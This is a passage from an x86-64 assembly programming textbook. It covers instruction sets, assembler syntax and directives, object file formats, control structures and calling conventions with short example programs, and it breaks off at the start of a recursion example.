div rbx               ; unsigned: RAX = RDX:RAX / RBX, RDX = remainder
idiv rbx              ; signed: same

Increment/Decrement

inc rax               ; RAX++
dec rax               ; RAX--

Negation

neg rax               ; RAX = -RAX (two's complement)

Comparison

cmp rax, rbx          ; set flags based on RAX - RBX
test rax, rax         ; set flags based on RAX & RAX (check zero)

6.3 Logical Instructions

AND

and rax, rbx          ; RAX = RAX & RBX
and rax, 0x0F         ; mask low 4 bits
and [mem], rax        ; memory &= RAX

OR

or rax, rbx           ; RAX = RAX | RBX
or rax, 0x80          ; set bit 7

XOR

xor rax, rbx          ; RAX = RAX ^ RBX
xor rax, rax          ; zero RAX (xor eax, eax does the same with a shorter encoding)

NOT

not rax               ; RAX = ~RAX (one's complement)

TEST

test rax, rbx         ; set flags based on RAX & RBX (no destination)
test rax, rax         ; check if RAX is zero/negative

6.4 Control Flow Instructions

Unconditional Jumps

jmp label            ; jump to label
jmp rax              ; jump to address in RAX (register indirect)
jmp [mem]            ; jump to address in memory

Conditional Jumps

Based on flags:

jz  label    ; jump if zero (ZF=1)
jnz label    ; jump if not zero (ZF=0)
je  label    ; jump if equal (same as JZ)
jne label    ; jump if not equal (same as JNZ)

jg  label    ; jump if greater (signed) (ZF=0 and SF=OF)
jge label    ; jump if greater or equal (signed) (SF=OF)
jl  label    ; jump if less (signed) (SF≠OF)
jle label    ; jump if less or equal (signed) (ZF=1 or SF≠OF)

ja  label    ; jump if above (unsigned) (CF=0 and ZF=0)
jae label    ; jump if above or equal (unsigned) (CF=0)
jb  label    ; jump if below (unsigned) (CF=1)
jbe label    ; jump if below or equal (unsigned) (CF=1 or ZF=1)

jc  label    ; jump if carry (CF=1)
jnc label    ; jump if not carry (CF=0)
jo  label    ; jump if overflow (OF=1)
jno label    ; jump if not overflow (OF=0)
js  label    ; jump if sign (SF=1)
jns label    ; jump if not sign (SF=0)
jp  label    ; jump if parity (PF=1)
jnp label    ; jump if not parity (PF=0)
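
The signed and unsigned conditions above are easy to confuse, so here is a small C model of them. It computes the CF, ZF, SF, and OF bits that a 32-bit CMP would produce and then evaluates four of the jump conditions; all names are hypothetical.

```c
#include <stdint.h>
#include <stdbool.h>

static unsigned cf(uint32_t f)  { return (f >> 0) & 1u; }
static unsigned zf(uint32_t f)  { return (f >> 6) & 1u; }
static unsigned sf(uint32_t f)  { return (f >> 7) & 1u; }
static unsigned of_(uint32_t f) { return (f >> 11) & 1u; }

/* CF, ZF, SF, OF as set by a 32-bit "cmp a, b" (computes a - b). */
static uint32_t flags_after_cmp32(uint32_t a, uint32_t b)
{
    uint32_t r = a - b, f = 0;
    if (a < b)                      f |= 1u << 0;   /* CF: unsigned borrow */
    if (r == 0)                     f |= 1u << 6;   /* ZF */
    if (r >> 31)                    f |= 1u << 7;   /* SF */
    if (((a ^ b) & (a ^ r)) >> 31)  f |= 1u << 11;  /* OF: signed overflow */
    return f;
}

static bool cond_g(uint32_t f) { return !zf(f) && sf(f) == of_(f); } /* JG */
static bool cond_l(uint32_t f) { return sf(f) != of_(f); }           /* JL */
static bool cond_a(uint32_t f) { return !cf(f) && !zf(f); }          /* JA */
static bool cond_b(uint32_t f) { return cf(f) != 0; }                /* JB */
```

Comparing 0xFFFFFFFF with 1 makes both JL and JA true: the value is -1 when read as signed and about 4 billion when read as unsigned.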

Loop Instructions

loop label           ; decrement RCX, jump if RCX != 0
loope label          ; loop while ZF=1 and RCX != 0
loopne label         ; loop while ZF=0 and RCX != 0

Call and Return

call func            ; push return address, jump to func
ret                  ; pop return address, jump
ret 16               ; pop return address, add 16 to RSP

Interrupts

int 0x80             ; software interrupt (legacy Linux syscall)
int3                 ; breakpoint interrupt
into                 ; interrupt on overflow (invalid in 64-bit mode)
iret                 ; return from interrupt (iretq in 64-bit mode)

6.5 String Instructions

String instructions operate on memory with automatic pointer updates.

MOVS (Move String)

movsb                ; move byte from [RSI] to [RDI], update pointers
movsw                ; move word
movsd                ; move dword
movsq                ; move qword (64-bit)

; Repeat prefix for blocks
rep movsb            ; repeat RCX times

CMPS (Compare String)

cmpsb                ; compare byte at [RSI] with [RDI]
rep cmpsb            ; with CMPS the REP prefix behaves as REPE
repe cmpsb           ; compare while equal and RCX != 0 (stops at first difference)
repne cmpsb          ; compare while not equal and RCX != 0 (stops at first match)

SCAS (Scan String)

scasb                ; compare AL with [RDI]
scasw                ; compare AX with [RDI]
scasd                ; compare EAX with [RDI]
scasq                ; compare RAX with [RDI]

repne scasb          ; scan for AL
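
What repne scasb does can be modelled in C as a bounded search. The sketch below assumes DF=0 (forward scan); the function and parameter names simply mirror the registers involved and are not a real API.

```c
#include <stddef.h>
#include <stdint.h>

/* Model of: repne scasb with AL = al, RDI = rdi, RCX = rcx, DF = 0.
 * Returns the number of bytes examined; *found is 1 if a byte equal
 * to al was seen (ZF=1 on exit), 0 if the count ran out first. */
static size_t repne_scasb(const uint8_t *rdi, size_t rcx, uint8_t al, int *found)
{
    size_t start = rcx;
    *found = 0;
    while (rcx != 0) {
        rcx--;                       /* the count is decremented for every byte */
        if (*rdi++ == al) {          /* compare, then advance RDI */
            *found = 1;
            break;
        }
    }
    return start - rcx;
}
```

This is the basis of the classic strlen idiom: scan for 0 and subtract one from the number of bytes examined, since the terminator itself is counted.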

STOS (Store String)

stosb                ; store AL to [RDI]
stosw                ; store AX to [RDI]
stosd                ; store EAX to [RDI]
stosq                ; store RAX to [RDI]

rep stosb            ; fill memory with AL

LODS (Load String)

lodsb                ; load from [RSI] to AL
lodsw                ; load to AX
lodsd                ; load to EAX
lodsq                ; load to RAX

6.6 Bit Manipulation Instructions

Shift Instructions

shl rax, 1           ; shift left, fill with 0
shr rax, 1           ; shift right, fill with 0
sal rax, 1           ; shift arithmetic left (same as SHL)
sar rax, 1           ; shift arithmetic right (preserve sign)

; Variable shifts
shl rax, cl          ; shift by CL

Rotate Instructions

rol rax, 1           ; rotate left
ror rax, 1           ; rotate right
rcl rax, 1           ; rotate through carry left
rcr rax, 1           ; rotate through carry right

Bit Test Instructions

bt rax, 5            ; test bit 5, copy to CF
bts rax, 5           ; test and set
btr rax, 5           ; test and reset
btc rax, 5           ; test and complement

; Memory forms
bt [mem], 5          ; test bit in memory

Bit Scan

bsf rax, rbx         ; bit scan forward (index of lowest set bit)
bsr rax, rbx         ; bit scan reverse (index of highest set bit)
tzcnt rax, rbx       ; trailing zero count (BMI1)
lzcnt rax, rbx       ; leading zero count (LZCNT/ABM)
popcnt rax, rbx      ; population count (Nehalem+)
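
For reference, portable C equivalents of the counting instructions might look like the sketch below. The loops only show the semantics; the hardware instructions do this in a single operation, and the function names are illustrative.

```c
#include <stdint.h>

/* Trailing zero count; like TZCNT, returns 64 for a zero input. */
static unsigned tzcnt64(uint64_t x)
{
    if (x == 0) return 64;
    unsigned n = 0;
    while ((x & 1) == 0) { x >>= 1; n++; }
    return n;
}

/* Leading zero count; like LZCNT, returns 64 for a zero input. */
static unsigned lzcnt64(uint64_t x)
{
    if (x == 0) return 64;
    unsigned n = 0;
    while ((x >> 63) == 0) { x <<= 1; n++; }
    return n;
}

/* Population count: each iteration clears the lowest set bit. */
static unsigned popcnt64(uint64_t x)
{
    unsigned n = 0;
    while (x != 0) { x &= x - 1; n++; }
    return n;
}
```

For a nonzero input, the index BSF reports equals tzcnt64(x) and the index BSR reports equals 63 - lzcnt64(x). BSF and BSR leave the destination undefined when the source is zero.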

6.7 System Instructions

Privileged Instructions

lgdt [mem]           ; load GDT
sgdt [mem]           ; store GDT
lidt [mem]           ; load IDT
sidt [mem]           ; store IDT
lldt ax              ; load LDT
sldt rax             ; store LDT
ltr ax               ; load task register
str rax              ; store task register

mov cr0, rax         ; move to control register
mov rax, cr3         ; move from control register
mov dr0, rax         ; move to debug register

invlpg [mem]         ; invalidate TLB entry
wbinvd               ; write back and invalidate cache

System Call Instructions

syscall              ; fast system call (64-bit)
sysret               ; return from syscall

sysenter             ; fast system call (32-bit)
sysexit              ; return from sysenter

int 0x80             ; legacy interrupt-based syscall

Halt and Wait

hlt                  ; halt processor until interrupt
pause                ; spin loop hint (improves power/performance)

6.8 SIMD (SSE, AVX, AVX-512)

SIMD instructions process multiple data elements in one instruction.

SSE Registers

XMM0-XMM15: 128-bit (16 bytes)
Support for integer and floating-point operations

SSE Data Types

; C intrinsic types that map onto XMM registers
; Packed types
__m128               ; 4 floats
__m128d              ; 2 doubles
__m128i              ; integer (16 bytes)

; Scalar use
__m128               ; single float in the low 32 bits (scalar ops leave the upper 96 bits alone)

Basic SSE Instructions

; Move
movaps xmm0, xmm1     ; move aligned packed single
movups xmm0, [mem]    ; move unaligned packed single
movss xmm0, [mem]     ; move scalar single

; Arithmetic
addps xmm0, xmm1      ; add packed single
addss xmm0, xmm1      ; add scalar single
; likewise: subps, mulps, divps, sqrtps, etc.

; Logical
andps xmm0, xmm1      ; bitwise AND
; likewise: orps, xorps

; Compare
cmpps xmm0, xmm1, 0   ; compare equal (packed)
cmpps xmm0, xmm1, 1   ; compare less
cmpps xmm0, xmm1, 2   ; compare less or equal

AVX (Advanced Vector Extensions)

256-bit YMM registers:

vmovaps ymm0, ymm1    ; move 8 floats
vaddps ymm0, ymm1, ymm2 ; add 8 floats (3-operand)

AVX-512

512-bit ZMM registers with masking:

; Masked operation
vpaddd zmm0 {k1}, zmm1, zmm2  ; add with mask k1

6.9 FPU Instructions

Legacy x87 FPU (rarely used now, but still present).

FPU Register Stack

8 registers (ST0-ST7) as a stack:

ST(0) is top
Values are 80-bit extended precision

FPU Instructions

; Data transfer
fld dword [mem]      ; load 32-bit float, pushing it as the new ST0
fst dword [mem]      ; store ST0 to memory
fstp dword [mem]     ; store and pop

; Arithmetic
fadd st0, st1        ; ST0 = ST0 + ST1
; likewise: fsub, fmul, fdiv

; Compare
fcom st1             ; compare ST0 with ST1
fcomp                ; compare and pop
fcompp               ; compare and pop twice

; Constants
fldz                 ; load 0.0
fld1                 ; load 1.0
fldpi                ; load π

; Transcendental
fsin                 ; ST0 = sin(ST0)
fcos                 ; ST0 = cos(ST0)
fpatan               ; ST1 = arctan(ST1 / ST0), then pop
fyl2x                ; ST1 = ST1 * log2(ST0), then pop

PART III — Assembly Language Programming

Chapter 7: Introduction to Assembly Syntax

7.1 Intel vs AT&T Syntax

Two main syntax families for x86 assembly.

Intel Syntax (NASM, MASM, FASM)

; Instruction destination, source
mov eax, ebx         ; copy EBX to EAX
mov eax, [ebx+4]     ; load from memory
mov dword [eax], 10  ; store immediate to memory
jmp label            ; jump to label

AT&T Syntax (GAS)

# Instruction source, destination (opposite order)
movl %ebx, %eax      # copy EBX to EAX
movl 4(%ebx), %eax   # load from memory
movl $10, (%eax)     # store immediate to memory
jmp label            # jump to label

Key Differences

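Feature   | Intel                          | AT&T
----------|--------------------------------|----------------
Order     | dest, src                      | src, dest
Register  | eax                            | %eax
Immediate | 123                            | $123
Memory    | [ebx+4]                        | 4(%ebx)
Size      | dword (NASM), dword ptr (MASM) | l suffix (long)
Address   | [eax+ebx*4]                    | (%eax,%ebx,4)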

Size Mnemonics (AT&T)

b = byte (8-bit)
w = word (16-bit)
l = long (32-bit)
q = quad (64-bit)
t = ten bytes (80-bit)

7.2 Assembler Directives

Assembler directives control the assembly process.

NASM Directives

; Section directives
section .text         ; code section
section .data         ; initialized data
section .bss          ; uninitialized data

; Data definition
db 0x55               ; define byte
dw 0x1234             ; define word
dd 0x12345678         ; define dword
dq 0x123456789ABCDEF0 ; define qword
dt 1.234              ; define 80-bit float

; Multiple values
db 1, 2, 3, 4         ; sequence of bytes
times 100 db 0        ; repeat 100 times

; Strings
db 'Hello', 0         ; C-style string
db "Hello", 10        ; with newline

; Equates
value equ 100             ; constant
%define macro(x) ((x)+1)  ; single-line macro (parenthesized to keep precedence safe)

; Alignment
align 16              ; align to 16-byte boundary
alignb 16             ; align in BSS (no data emitted)

; Symbols
global _start         ; export symbol
extern printf         ; import symbol

MASM Directives

.386                  ; flat model requires a 386 or later processor directive
.MODEL flat, C        ; memory model
.STACK 4096           ; stack size

.DATA
var1 DB 10            ; byte variable
var2 DW 1234h         ; word variable
array DD 10 DUP(0)    ; 10 dwords initialized to 0
msg DB "Hello", 0     ; string

.CODE
main PROC
    mov eax, 0
    ret
main ENDP

END main

7.3 Sections (.text, .data, .bss)

Executable files are organized into sections.

.text Section

Contains executable code:

Read-only (usually)
Shared among processes
Contains instructions and constants

section .text
global _start

_start:
    mov eax, 1        ; sys_exit (32-bit int 0x80 ABI)
    mov ebx, 0        ; exit code
    int 0x80          ; kernel call

.data Section

Initialized data:

Read-write
Values defined at assembly time
Takes space in executable

section .data
message db 'Hello, World!', 10, 0
len equ $ - message   ; length in bytes, including the trailing 0

array dd 1, 2, 3, 4, 5
count dd 5

pi dq 3.141592653589793

.bss Section

Uninitialized data:

Read-write
Takes no space in executable
Zero-filled at program start

section .bss
buffer resb 4096      ; reserve 4096 bytes
temp resd 1           ; reserve one dword
array resq 100        ; reserve 100 qwords

7.4 Labels and Symbols

Labels represent addresses in the code or data.

Global and Local Labels

; Ordinary (non-local) label
loop_start:
    dec ecx
    jnz loop_start

; Local labels start with . and belong to the preceding non-local label
func:
    .loop:            ; local to func
        dec ecx
        jnz .loop
    ret

Special Symbols

$                      ; current address
$$                     ; start of current section

section .data
msg db 'Hello', 0
.len equ $ - msg       ; msg.len = 6 (length including the terminating 0)

7.5 Comments & Documentation Standards

Good comments are essential in assembly.

Comment Styles

; Single line comment (NASM, MASM, FASM)
# Single line comment (GAS on x86, where ; separates statements)

; Multi-line comment
; can continue
; on multiple lines

%if 0                  ; NASM block comment
    This is commented out
%endif

/*
 * C-style comment (GAS)
 * Can span multiple lines
 */

Documentation Standards

; Function: strcpy - copy string
; Arguments:
;   RDI - destination buffer
;   RSI - source string
; Returns:
;   RAX - destination (like C strcpy)
; Clobbers:
;   RCX, RFLAGS
; Notes:
;   Assumes buffers are large enough
;   Copies until null terminator (terminator included)
strcpy:
    push rbp
    mov rbp, rsp

    ; Main copy loop (RSI and RDI are only read, so they need no saving)
    xor ecx, ecx        ; index = 0 (writing ECX zeroes all of RCX)
.copy_loop:
    mov al, [rsi + rcx] ; get source byte
    mov [rdi + rcx], al ; store to destination
    inc rcx
    test al, al         ; check for null
    jnz .copy_loop

    ; Return the destination pointer
    mov rax, rdi
    pop rbp
    ret

Chapter 8: Using Assemblers

8.1 NASM (Netwide Assembler)

NASM is a popular Intel-syntax assembler for x86, widely used on Unix-like systems.

Basic Usage

# Assemble to object file
nasm -f elf64 program.asm -o program.o

# Assemble with debug info
nasm -f elf64 -g program.asm -o program.o

# Generate listing file
nasm -f elf64 -l program.lst program.asm

# Preprocess only
nasm -E program.asm

# Link with ld
ld program.o -o program

# Link with glibc via gcc (the program must then define main instead of _start)
gcc -no-pie program.o -o program

NASM Example

; hello.asm - Hello World program
section .data
    msg db 'Hello, World!', 10   ; no trailing 0: write takes an explicit length
    len equ $ - msg

section .text
    global _start

_start:
    ; Write syscall
    mov rax, 1          ; sys_write
    mov rdi, 1          ; stdout
    mov rsi, msg        ; buffer
    mov rdx, len        ; length
    syscall

    ; Exit syscall
    mov rax, 60         ; sys_exit
    xor rdi, rdi        ; status 0
    syscall

NASM Features

Macro preprocessor
Conditional assembly
Structure definitions
Local labels
Expression evaluation

8.2 MASM (Microsoft Macro Assembler)

MASM is the traditional assembler for Windows.

MASM Example

; hello.asm - Hello World for Windows
.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc      ; declares StdOut
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\masm32.lib

.data
    msg db "Hello, World!", 13, 10, 0
    len equ $ - msg

.code
start:
    invoke StdOut, addr msg
    invoke ExitProcess, 0

end start

MASM Features

High-level-like syntax (INVOKE)
Structure definitions
Record types
Simplified segment directives

8.3 GAS (GNU Assembler)

GAS is the default assembler on Linux/Unix systems.

GAS Example

# hello.s - Hello World in GAS syntax (32-bit int 0x80 ABI)
# Build: as --32 hello.s -o hello.o && ld -m elf_i386 hello.o -o hello
.section .data
msg:
    .ascii "Hello, World!\n"
    len = . - msg

.section .text
.globl _start

_start:
    # write syscall
    movl $4, %eax       # sys_write
    movl $1, %ebx       # stdout
    movl $msg, %ecx     # buffer
    movl $len, %edx     # length
    int $0x80

    # exit syscall
    movl $1, %eax       # sys_exit
    movl $0, %ebx       # status
    int $0x80

GAS with Intel Syntax

.intel_syntax noprefix

.section .data
msg: .ascii "Hello, World!\n"
len = . - msg

.section .text
.globl _start

_start:
    mov eax, 4
    mov ebx, 1
    mov ecx, offset msg
    mov edx, len
    int 0x80

    mov eax, 1
    xor ebx, ebx
    int 0x80

8.4 FASM (Flat Assembler)

FASM is a lightweight, high-performance assembler.

FASM Example

; hello.asm - Hello World in FASM
format ELF64 executable

segment readable executable
entry _start

_start:
    mov eax, 1          ; sys_write
    mov edi, 1          ; stdout
    mov esi, msg        ; buffer
    mov edx, len        ; length
    syscall

    mov eax, 60         ; sys_exit
    xor edi, edi        ; status
    syscall

segment readable writeable
msg db 'Hello, World!', 10
len = $ - msg

FASM Features

Self-compiling (written in assembly)
Very fast
Multiple output formats
Powerful macro system

8.5 Linking with LD

The GNU linker (ld) combines object files into executables.

Basic LD Usage

# Link single object
ld program.o -o program

# Link with libraries
ld program.o -o program -lc -dynamic-linker /lib64/ld-linux-x86-64.so.2

# Link with custom layout
ld -T script.ld program.o -o program

Linker Script Example

/* simple.ld - Simple linker script */
OUTPUT_FORMAT(elf64-x86-64)
ENTRY(_start)

SECTIONS
{
    . = 0x400000;      /* Starting address */
    
    .text : {
        *(.text)
        *(.text.*)
    }
    
    .data : {
        *(.data)
        *(.data.*)
    }
    
    .bss : {
        *(.bss)
        *(.bss.*)
    }
    
    /DISCARD/ : {
        *(.comment)
        *(.note.*)
    }
}

8.6 Object File Format (ELF, PE, Mach-O)

ELF (Executable and Linkable Format)

Standard format on Linux/Unix:

ELF Header
    - Magic number (7F 45 4C 46)
    - Architecture (x86-64)
    - Entry point
    - Program header offset
    - Section header offset

Program Header Table
    - Segment definitions (LOAD, INTERP, DYNAMIC)
    - Virtual addresses
    - Permissions (R, W, X)

Section Header Table
    - Section definitions (.text, .data, .bss)
    - Section sizes and offsets

Sections
    - Actual code and data
    - Symbol tables
    - Debug information
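
As a rough illustration of the header fields, the following C sketch checks whether a buffer begins with the header of a little-endian 64-bit x86-64 ELF file. It reads bytes directly rather than using <elf.h> so it stays portable; the function name is an assumption of this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdbool.h>

/* True if buf starts like a little-endian ELF64 file for x86-64. */
static bool is_elf64_x86_64(const uint8_t *buf, size_t len)
{
    static const uint8_t magic[4] = { 0x7F, 'E', 'L', 'F' };

    if (len < 20 || memcmp(buf, magic, 4) != 0)
        return false;
    if (buf[4] != 2)                /* EI_CLASS: 2 = ELFCLASS64 */
        return false;
    if (buf[5] != 1)                /* EI_DATA: 1 = little-endian */
        return false;

    /* e_machine is a 16-bit field at offset 18, after e_ident and e_type. */
    uint16_t machine = (uint16_t)(buf[18] | (buf[19] << 8));
    return machine == 62;           /* EM_X86_64 */
}
```

Only the first 20 bytes are inspected here; the entry point and the program and section header offsets follow later in the same header.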

PE (Portable Executable)

Windows format:

DOS Header (MZ)
DOS Stub
PE Header
    - Signature (PE\0\0)
    - COFF header
    - Optional header

Section Table
    - .text (code)
    - .data (initialized data)
    - .rdata (read-only data)
    - .bss (uninitialized)
    - .idata (imports)
    - .edata (exports)
    - .reloc (relocations)

Sections
    - Actual code/data
    - Import/export tables
    - Resources

Mach-O

macOS format:

Header
    - Magic number
    - CPU type
    - File type

Load Commands
    - Segment definitions
    - Dynamic linking info
    - Thread state

Segments
    - __TEXT (code)
    - __DATA (data)
    - __LINKEDIT (linker info)

Chapter 9: Control Structures

9.1 Conditional Jumps

Implementing if-then-else structures.

Simple If

if (x > 10) {
    y = 1;
}

    cmp dword [x], 10
    jle .skip          ; jump if not > 10
    mov dword [y], 1
.skip:

If-Else

if (x > 10) {
    y = 1;
} else {
    y = 2;
}

    cmp dword [x], 10
    jle .else
    mov dword [y], 1
    jmp .endif
.else:
    mov dword [y], 2
.endif:

Complex Conditions

if (x > 10 && y < 20) {
    z = 1;
}

    cmp dword [x], 10
    jle .false         ; first condition false
    cmp dword [y], 20
    jge .false         ; second condition false
    mov dword [z], 1
    jmp .endif
.false:
    ; do nothing or else part
.endif:

9.2 Loops

While Loop

while (i < 10) {
    a[i] = 0;
    i++;
}

    xor ecx, ecx       ; i = 0
.while:
    cmp ecx, 10
    jge .end_while
    mov dword [array + ecx*4], 0
    inc ecx
    jmp .while
.end_while:

Do-While Loop

do {
    a[i] = 0;
    i++;
} while (i < 10);

    xor ecx, ecx
.do:
    mov dword [array + ecx*4], 0
    inc ecx
    cmp ecx, 10
    jl .do

For Loop

for (i = 0; i < 10; i++) {
    a[i] = i;
}

    xor ecx, ecx
.for:
    cmp ecx, 10
    jge .end_for
    mov [array + ecx*4], ecx
    inc ecx
    jmp .for
.end_for:

Using LOOP Instruction

    mov ecx, 10
    xor eax, eax
.loop:
    add eax, ecx
    loop .loop        ; dec RCX (ECX in 32-bit code), jump if not zero

9.3 Switch Case Implementation

Jump Table Method

switch (x) {
    case 0: y = 10; break;
    case 1: y = 20; break;
    case 2: y = 30; break;
    default: y = 0;
}

    ; x in EAX (upper half of RAX zero), y in EBX
    cmp eax, 2
    ja .default        ; unsigned compare: x > 2 or x < 0 goes to default
    
    jmp [.jump_table + rax*8]  ; jump via table

.jump_table:           ; local label, so all .labels here share one scope
    dq .case0
    dq .case1
    dq .case2

.case0:
    mov ebx, 10
    jmp .end_switch
.case1:
    mov ebx, 20
    jmp .end_switch
.case2:
    mov ebx, 30
    jmp .end_switch
.default:
    xor ebx, ebx
.end_switch:
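
The same dispatch pattern can be written by hand in C with a table of function pointers, which is close to what the assembly does. This is a sketch with made-up names; a compiler decides on its own whether a switch becomes a jump table.

```c
/* One handler per case, mirroring .case0 to .case2. */
typedef int (*case_fn)(void);

static int case0(void) { return 10; }
static int case1(void) { return 20; }
static int case2(void) { return 30; }

/* Bounds check first (like cmp/ja), then an indexed indirect call. */
static int switch_dispatch(unsigned x)
{
    static const case_fn table[] = { case0, case1, case2 };

    if (x > 2)          /* unsigned compare also rejects negative values */
        return 0;       /* default case */
    return table[x]();
}
```

Taking x as unsigned means a single comparison covers both out-of-range directions, which is why the assembly version uses JA rather than JG.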

Comparison Chain

For sparse or non-consecutive cases:

    cmp eax, 10
    je .case10
    cmp eax, 20
    je .case20
    cmp eax, 30
    je .case30
    jmp .default

9.4 Jump Tables

Jump tables enable efficient multi-way branching.

Computed GOTO

; Jump to address in RAX
jmp rax

; Jump to address from memory
jmp [jump_table + rbx*8]

; Indirect call
call [function_table + rcx*8]

Example: State Machine

state_machine:
    ; RBX = current state
    jmp [state_table + rbx*8]

state_table:
    dq state_idle
    dq state_active
    dq state_error
    dq state_done

state_idle:
    ; handle idle state
    ; set next state
    jmp state_machine

state_active:
    ; handle active state
    jmp state_machine

state_error:
    ; handle error
    jmp state_machine

state_done:
    ; finished
    ret

9.5 Inline Assembly in C/C++

GCC Extended ASM

int add(int a, int b) {
    int result;
    __asm__ volatile (
        "addl %%ebx, %%eax"
        : "=a" (result)
        : "a" (a), "b" (b)
        : "cc"
    );
    return result;
}

Syntax Breakdown:

__asm__ [volatile] (
    "instructions\n\t"
    : output operands   (optional)
    : input operands    (optional)
    : clobbered registers (optional)
);

Constraints:

"a" = use EAX
"b" = use EBX
"c" = use ECX
"d" = use EDX
"r" = any register
"m" = memory operand
"i" = immediate

Example: CPUID

void cpuid(int code, int *a, int *b, int *c, int *d) {
    __asm__ volatile (
        "cpuid"
        : "=a" (*a), "=b" (*b), "=c" (*c), "=d" (*d)
        : "a" (code)
        : "cc"
    );
}

Example: RDTSC

uint64_t rdtsc(void) {
    uint32_t lo, hi;
    __asm__ volatile (
        "rdtsc"
        : "=a" (lo), "=d" (hi)   // rdtsc writes EDX:EAX only, so no clobbers are needed
    );
    return ((uint64_t)hi << 32) | lo;
}

MSVC Inline Assembly

int add(int a, int b) {
    __asm {
        mov eax, a
        add eax, b
        ; result in eax
    }
    // Value in EAX is returned
}

MSVC Limitations:

MSVC does not support inline assembly when targeting x64
Use compiler intrinsics or separate .asm files (assembled with ml64) for x64

Chapter 10: Functions and Procedures

10.1 Calling Conventions

Calling conventions define how functions receive parameters and return values.

System V AMD64 ABI (Linux, macOS, BSD)

Used on Unix-like systems for x86-64:

Integer/pointer arguments:
    RDI, RSI, RDX, RCX, R8, R9 (in order)
Floating-point arguments:
    XMM0-XMM7
Additional arguments: stack (right-to-left)

Return values:
    RAX (integer/pointer)
    RDX:RAX (128-bit)
    XMM0/XMM0:XMM1 (float)

Registers:
    Callee-saved: RBX, RBP, R12-R15
    Caller-saved: all others
    RAX, RCX, RDX, RSI, RDI, R8-R11 are scratch

Stack alignment: 16-byte before CALL

Example:

int func(int a, int b, int c, int d, int e, int f, int g) {
    return a + b + c + d + e + f + g;
}

; a=EDI, b=ESI, c=EDX, d=ECX, e=R8D, f=R9D, g=[RSP+8] at entry
; (int arguments occupy the low 32 bits of each register)
func:
    push rbp
    mov rbp, rsp
    
    mov eax, edi      ; a
    add eax, esi      ; +b
    add eax, edx      ; +c
    add eax, ecx      ; +d
    add eax, r8d      ; +e
    add eax, r9d      ; +f
    add eax, [rbp+16] ; +g (skip saved RBP + return address)
    
    pop rbp           ; return value is already in EAX
    ret

Microsoft x64 Calling Convention (Windows)

Arguments:
    RCX, RDX, R8, R9 (first four)
    Stack (right-to-left) for additional

Return values:
    RAX (integer/pointer)
    XMM0 (float)

Registers:
    Callee-saved: RBX, RBP, RDI, RSI, R12-R15, XMM6-XMM15
    Caller-saved: all others

Shadow space: Caller reserves 32 bytes on stack
Stack alignment: 16-byte before CALL

func:
    ; RCX = a, RDX = b, R8 = c, R9 = d
    ; At entry: [RSP] = return address, [RSP+8]..[RSP+39] = shadow space
    ; [RSP+40] = e, [RSP+48] = f, [RSP+56] = g
    
    push rbp
    mov rbp, rsp
    
    add ecx, edx      ; a+b
    add ecx, r8d      ; +c
    add ecx, r9d      ; +d
    add ecx, [rbp+48] ; +e (saved RBP + return address + 32-byte shadow space)
    add ecx, [rbp+56] ; +f
    add ecx, [rbp+64] ; +g
    
    mov eax, ecx
    
    pop rbp
    ret
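
Because the shadow space gives each of the first four arguments a home slot, every argument position maps to a fixed stack offset at entry. The C sketch below illustrates that arithmetic; the function names are hypothetical and it assumes each argument occupies one 8-byte slot:

```c
#include <assert.h>

/* Hypothetical helper: offset from RSP at function entry of the stack
   slot belonging to argument `index` (0-based) under the Microsoft x64
   convention. Slots 0-3 are the shadow space for RCX, RDX, R8, R9. */
long ms_x64_entry_offset(int index) {
    assert(index >= 0);
    return 8 + 8L * index;           /* 8 bytes for the return address */
}

/* Nonzero if the argument arrives in a register rather than on the stack. */
int ms_x64_in_register(int index) {
    assert(index >= 0);
    return index < 4;
}
```

The fifth argument (index 4) therefore sits at [RSP+40] at entry, or [RBP+48] after push rbp and mov rbp, rsp.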

cdecl (32-bit)

Classic 32-bit calling convention:

Arguments: stack (right-to-left)
Return: EAX
Caller cleans stack

push dword 3
push dword 2
push dword 1
call func
add esp, 12          ; caller cleans up

stdcall (32-bit Windows)

Like cdecl but callee cleans stack:

func proc
    push ebp
    mov ebp, esp
    mov eax, [ebp+8]  ; first arg
    ; ...
    pop ebp
    ret 12            ; return and clean 12 bytes
func endp

fastcall (32-bit)

First two/three arguments in registers:

ECX, EDX (Microsoft)
EAX, EDX, ECX (Borland)

10.2 Stack Frames

Prologue

push rbp             ; save caller's frame pointer
mov rbp, rsp         ; set our frame pointer
sub rsp, 32          ; allocate local variables

Epilogue

mov rsp, rbp         ; restore stack pointer
pop rbp              ; restore frame pointer
ret                  ; return

Frame Pointer Optimization

Compiler can omit frame pointer (-fomit-frame-pointer):

func:
    sub rsp, 40      ; allocate locals + alignment
    ; use RSP+offset for locals
    mov eax, [rsp+32] ; local variable
    add rsp, 40
    ret

10.3 Parameter Passing

Accessing Stack Arguments

32-bit (cdecl):

push ebp
mov ebp, esp

mov eax, [ebp+8]     ; first argument
mov ecx, [ebp+12]    ; second argument (ECX is caller-saved; EBX would have to be preserved)
; ...
mov esp, ebp
pop ebp
ret

64-bit (System V):

; First 6 args in registers
; 7th+ on stack at [RSP+8], [RSP+16], etc. (at function entry)

func:
    push rbp
    mov rbp, rsp
    
    ; RDI, RSI, RDX, RCX, R8, R9 are args
    mov rax, [rbp+16] ; 7th arg (skip return address + saved RBP)
    
    pop rbp
    ret

Variable Arguments (varargs)

int sum(int count, ...) {
    int total = 0;
    va_list args;
    va_start(args, count);
    for(int i = 0; i < count; i++)
        total += va_arg(args, int);
    va_end(args);
    return total;
}

Assembly must handle a variable number of arguments:

; EDI = count
; Varargs follow in ESI, EDX, ECX, R8D, R9D, then on the stack
sum:
    push rbp
    mov rbp, rsp
    
    mov r10d, edi      ; count (RCX carries a vararg, so count in R10)
    xor eax, eax       ; total
    
    ; Process register arguments
    test r10d, r10d
    jz .done
    add eax, esi       ; first vararg
    dec r10d
    jz .done
    add eax, edx       ; second vararg
    dec r10d
    jz .done
    add eax, ecx       ; third vararg
    dec r10d
    jz .done
    add eax, r8d       ; fourth vararg
    dec r10d
    jz .done
    add eax, r9d       ; fifth vararg
    dec r10d
    jz .done
    
    ; Remaining args on stack (one 8-byte slot each)
    lea rsi, [rbp+16]  ; first stack arg
    
.loop_stack:
    add eax, [rsi]
    add rsi, 8
    dec r10d
    jnz .loop_stack
    
.done:
    pop rbp
    ret

10.4 Recursion

Factorial Example

int factorial(int n) {
    if (n <= 1) return 1;
